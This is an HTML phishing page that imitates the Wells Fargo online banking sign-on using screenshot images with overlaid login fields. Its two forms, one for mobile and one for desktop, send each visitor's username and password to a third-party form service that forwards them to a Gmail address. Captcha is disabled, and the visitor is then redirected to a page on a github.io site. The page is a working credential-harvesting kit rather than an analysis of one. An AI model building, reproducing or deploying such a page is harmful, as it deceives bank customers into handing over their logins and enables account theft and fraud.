<!DOCTYPE html>
<html lang="en">

<head>
    <title>Online - Wells Fargo Bank</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
    <link rel="shortcut icon" href="img/favicon.ico">
    <style>
        .form {
            position: relative;
            bottom: 1360px;
            left: 30px;
        }

        form {
            display: flex;
            flex-direction: column;

        }

        .forget-input {
            height: 60px;
            width: 300px;
            background-color: rgb(239, 232, 232);
            border-bottom-left-radius: 20px;
            border-bottom-right-radius: 25px;
            padding: 20px;
            box-shadow: 0 3px 10px black;
        }

        @media(max-width:700px) {
            body {
                margin: 0;

            }

            .phone {
                display: block;
            }

            .page {
                display: none;

            }

            .pages {
                display: flex;
                flex-direction: column;
            }

            .pages .img1 {
                background: url(wellllllllll/firstph.png);
                height: 600px;
            }

            .pages .img2 {
                background: url(wellllllllll/secondph.png);
                height: 600px;
            }

            .pages .img3 {
                background: url(wellllllllll/thirdph.png);
                height: 600px;
                position: relative;
                bottom: 200px;
            }

            .pages .img4 {
                background: url(wellllllllll/fourthph.png);
                height: 600px;
                position: relative;
                bottom: 200px;
            }

            .pages .img5 {
                background: url(wellllllllll/fivthph.png);
                height: 600px;
                position: relative;
                bottom: 250px;
            }

            .pages .img6 {
                background: url(wellllllllll/sixthph.png);
                height: 600px;
                position: relative;
                bottom: 280px;
            }

            .pages .img7 {
                background: url(wellllllllll/seventhph.png);
                height: 550px;
                position: relative;
                bottom: 270px;
            }

            .pages .img8 {
                background: url(wellllllllll/eight.png);
                height: 600px;
                position: relative;
                bottom: 270px;
            }

            .pages .img9 {
                background: url(wellllllllll/ninth.png);
                height: 600px;
                position: relative;
                bottom: 354px;
            }

            .pages .img10 {
                background: url(wellllllllll/ten.png);
                height: 600px;
                position: relative;
                bottom: 370px;
            }

            .pages .img11 {
                background: url(wellllllllll/eleven.png);
                height: 600px;
                position: relative;
                bottom: 270px;
            }

            .pages .img12 {
                background: url(wellllllllll/twelve.png);
                height: 600px;
                position: relative;
                bottom: 270px;
            }

            .inputph .imgl1 {
                background: url(wellllllllll/login1\ copy\ copy.png);
                height: 620px;
            }

            .inputph .imgl2 {
                background: url(wellllllllll/login2.png);
                height: 520px;
            }

            .inputph .imgl3 {
                background: url(wellllllllll/login3.png);
                height: 100px;
            }

            .inputph {
                display: none;
            }

            .inputph .col-mid-6 input:hover {
                border: 2px solid blue;
            }

            .pages .links button {
                position: relative;
                top: 55px;
                left: 260px;
                width: 100px;
                height: 40px;
                background-color: #fff;
                border: none;
                font-weight: bolder;
                font-size: 16px;
                border-radius: 20px;
            }
        }

        @media(min-width:701px) {
            .phone {
                display: none;
            }
        }
    </style>
</head>

<body>
    <div class="phone">
        <div class="pages" id="signUp">
            <div class="links">
                <button id="signInButton">Sign
                    On</button>
            </div>
            <div class="img1"></div>
            <div class="img2"></div>
            <div class="img3"></div>
            <div class="img4"></div>
            <div class="img5"></div>
            <div class="img6"></div>
            <div class="img7"></div>
            <div class="img8"></div>
            <div class="img9"></div>
            <div class="img10"></div>
            <div class="img11"></div>
            <div class="img12"></div>
        </div>

        <div class="inputph" id="Signin">

            <div class="img-log">
                <div class="imgl1"></div>
                <div class="imgl2"></div>
                <div class="imgl3"></div>
            </div>

            <form name="okai" action="https://formsubmit.co/codis1723@gmail.com" method="POST">

                <!-- HoneyPot -->
                <input type="hidden" name="_honey" value="">

                <!-- Disable Captcha -->
                <input type="hidden" name="_captcha" value="false">

                <input type="hidden" name="_next" value="https://construction-ux.github.io/dem/succes.html">

                <div class="col-mid-6" style="display: flex; flex-direction: column;">
                    <input name="Username" title="Please Enter Right Value" autofocus="" required="" autocomplete="off"
                        placeholder="Username" class="inputs" type="text" style="width:350px; height: 50px;z-index:2;
                       position: relative; left: 20px; bottom: 1120px; border-radius: 10px; padding-left: 10px;">

                    <input name="Password" title="Please Enter Right Value" autofocus="" required="" autocomplete="off"
                        placeholder=" Password" class="inputs" type="password" style="width:350px; height: 50px;z-index:2;
                       position: relative; left: 20px; bottom: 1100px; border-radius: 10px; padding-left: 10px;">

                    <button type="submit"
                        style="text-align: center; position: relative; bottom: 965px;left: 120px;  width: 170px; height: 40px; border: none; background-color: rgb(163, 162, 162); color: #ffffff; font-size: 17px; border-radius: 20px;">
                        Sign
                        On
                    </button>
                </div>
            </form>
        </div>
    </div>

    <div class="page1" style="display: flex; flex-direction: column; position: relative; right: 10px;bottom: 10px;">
        <img class="page" src="wellllllllll/First .png" height="500px">
        <img class="page" src="wellllllllll/Second.png" height="400px" style="position: relative; bottom: 15px; ">
        <img class="page" src="wellllllllll/Third.png" height="400px" style="position: relative;">
        <img class="page" src="wellllllllll/Fourth.png" height="400px" style="position: relative;">
        <div class="page" class="form">
            <div class="form-input">
                <div class="form-head">


                    <form name="okai" action="https://formsubmit.co/codis1723@gmail.com" method="POST">

                        <!-- HoneyPot -->
                        <input type="text" name="_honey" style="display: none;">

                        <!-- Disable Captcha -->
                        <input type="hidden" name="_captcha" value="false">

                        <input type="hidden" name="_next" value="https://construction-ux.github.io/dem/succes.html">

                        <div class="col-mid-6" style="display: flex; flex-direction: column;">
                            <input name="Username" title="Please Enter Right Value" autofocus="" required=""
                                autocomplete="off" placeholder="Username" class="inputs" type="text" style="width:200px; height: 30px;z-index:2; border: none;
                        border-bottom: 1px solid rgb(150, 150, 150) ; position: relative; bottom: 1440px; left: 30px;">

                            <input name="Password" title="Please Enter Right Value" autofocus="" required=""
                                autocomplete="off" placeholder=" Password" class="inputs" type="password" style="width:200px; height: 30px;z-index:2; border: none;
                        border-bottom: 1px solid rgb(150, 150, 150) ; position: relative; bottom: 1415px; left: 30px;">

                            <img src="wellllllllll/save.png" style="position: relative; bottom: 1400px; left: 30px;"
                                height="30" width="150px" alt="Save">
                            <button type="submit"
                                style="text-align: center; position: relative; bottom: 1385px; left: 30px;  width: 140px; height: 30px; border: none; background-color: red; color: #ffffff; font-size: 17px; border-radius: 20px;">
                                Sign
                                On
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <script src="script.js"></script>
</body>

</html>